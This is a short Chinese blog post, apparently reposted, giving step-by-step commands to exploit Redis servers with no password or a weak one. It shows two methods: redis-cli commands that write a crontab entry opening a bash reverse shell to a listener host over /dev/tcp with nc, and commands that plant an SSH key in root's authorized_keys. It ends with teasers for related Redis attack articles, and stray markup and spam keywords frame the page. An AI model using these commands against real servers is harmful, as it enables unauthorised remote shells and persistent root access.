<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    redis弱密碼漏洞利用

    VSole2021-11-25 07:00:19

    背景:

    redis無認證,或者弱密碼,可以成功連接到redis服務器

    反彈shell拿到的權限取決于redis的啟動賬號

    操作:

    1. Centos7安裝redis客戶端

    #yum install redis      --查看是否有redis   yum 源#yum install epel-release    --下載fedora的epel倉庫# yum install redis    -- 安裝redis數據庫
    

    【漏洞利用方法1 寫crontab,反彈shell】

    2.連接redis服務器,執行命令

    #redis-cli -h 10.1.1.2 -a 123456 //如果沒有密碼,不用添加-a參數10.1.1.2:6379> config set dir /var/spool/cronOK10.1.1.2:6379> config set dbfilename rootOK10.1.1.2:6379> set xxoo "*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1"10.1.1.2:6379>saveOK
    

    上面的方法是需要先連接到redis服務器,然后再執行命令,也可以直接執行命令,無需連接

    #echo -e "*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1"|redis-cli -h 192.168.118.129 -a 123456 -x set 1#redis-cli -h 192.168.118.129 -a 123456 config set dir /var/spool/cron/#redis-cli -h 192.168.118.129 -a 123456 config set dbfilename root#redis-cli -h 192.168.118.129 -a 123456 save 
    

    3.在 10.1.1.1上執行

    #nc -l -p 1234 -vv //監聽1234端口
    

    很快就能收到shell

    【漏洞利用方法2 寫authorized_keys 實現無密碼登錄】

     執行命令如下:

    127.0.0.1:6379>flushallOK
    127.0.0.1:6379>config set dir /root/.ssh/OK
    127.0.0.1:6379>config set dbfilename authorized_keysOK
    127.0.0.1:6379>set xxoo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxna91qSLsy9sbYSZNYMpe0root@localhost.localdomain"OK
    127.0.0.1:6379>saveOK
    

    然后ssh 連接目標服務器即可

    redisconfig
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    .Net之延遲隊列
    2022-07-27 17:54:49
    介紹具有隊列的特性,再給它附加一個延遲消費隊列消息的功能,也就是說可以指定隊列中的消息在哪個時間點被消費。
    NoSQL,泛指非關系型的數據庫。NoSQL有時也稱作Not Only SQL的縮寫,是對不同于傳統的關系型數據庫的數據庫管理系統的統稱。NoSQL用于超大規模數據的存儲。(例如谷歌或Facebook每天為他們的用戶收集萬億比特的數據)。這些類型的數據存儲不需要固定的模式,無需多余操作就可以橫向擴展。 分類
    起因舍友在宿舍喊著,這服務器好卡啊,難受啊!一看嚇一跳,一個叫做sysupdate的進程占據了絕大部分的CPU資源。CPU使用率接近100%。看來被挖礦是坐實了。清除過程確定病因這個病毒還不是算很變態,很多挖礦病毒,使用top命令都看不到挖礦程序的進程。查看病毒的PID號。發現sysupdate的絕對路徑在/etc/sysupdate。緊接著拼接curl下載并執行遠程shell的語句,并調用Save寫入文件中。sysguard作者叫他是Watchdog,主要功能就是監控自己的各程序,定時任務等是否啟動正常。
    redis弱密碼漏洞利用
    2021-11-25 07:00:19
    redis無認證,或者弱密碼,可以成功連接到redis服務器 反彈shell拿到的權限取決于redis的啟動賬號 操作: 1. Centos7安裝redis客戶端 #yum install redis --查看是否有redis yum 源#yum install epel-release --下載fedora的epel倉庫# yum install redis -
    Redis未授權漏洞
    2021-11-19 22:05:17
    Redis 默認情況下,會綁定在 本地6379端口,如果沒有進行相關策略,會將 Redis 服務暴露到公網上,在沒有設置密碼認證的情況下,任意用戶在可以訪問目標服務器的情況下未授權訪問Redis 以及讀取 Redis 的數據。靶機是Jacky馬的服務器,快到期了就沒脫敏。
    Redis 是一個開源的使用 ANSI C 語言編寫、支持網絡、可基于內存亦可持
    Redis系列漏洞總結
    2023-06-19 10:29:18
    前言Redis的未授權漏洞一直都是一個很火的漏洞,最近看許多前輩的文章自己復現后,根據自己的實踐再次總結一下,為日后復習方便回顧。Redis簡介redis是一個key-value存儲系統。和Memcached類似,它支持存儲的value類型相對更多,包括string、list、set、zset和hash。這些數據類型都支持push/pop、add/remove及取交集并集和差集及更豐富的操作,而且這些操作都是原子性的。在此基礎上,redis支持各種不同方式的排序。
    2在一次滲透測試中拿到一個ip地址52.80.249.xx,nmap端口掃描出22,6379,80端口,目標機是linux系統的一臺服務器,6379為redis的默認端口,嘗試對其進行利用。
    提及 Redis 自然是耳熟能詳,說起 Redis 的漏洞的話,未授權訪問漏洞、主從復制漏洞等也是張口就來,所以打算對 Redis 進行一個全面的總結。
    7月22日,Redis官方發布了Redis遠程代碼執行漏洞的風險通告,漏洞編號為CVE-2021-32761。建議受影響用戶及時升級到安全版本進行防護,并做好資產自查以及預防工作,以免遭受黑客攻擊。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类